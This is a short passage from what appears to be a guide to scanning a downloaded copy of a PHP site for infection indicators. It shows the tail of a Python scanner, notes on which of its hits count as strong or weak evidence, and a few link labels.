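        print(f"{reason:16} {path}")
```

The MD5 inputs are absolute paths, so pass the document root exactly as PHP saw it on the server when scanning a downloaded copy. A `cnf` hit on its own is weak evidence; the derived `.php` names and the marker are the strong ones.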

Useful links:
Decoding
PHP formatting tidy
Raw paste (Twice? Or injected twice…)


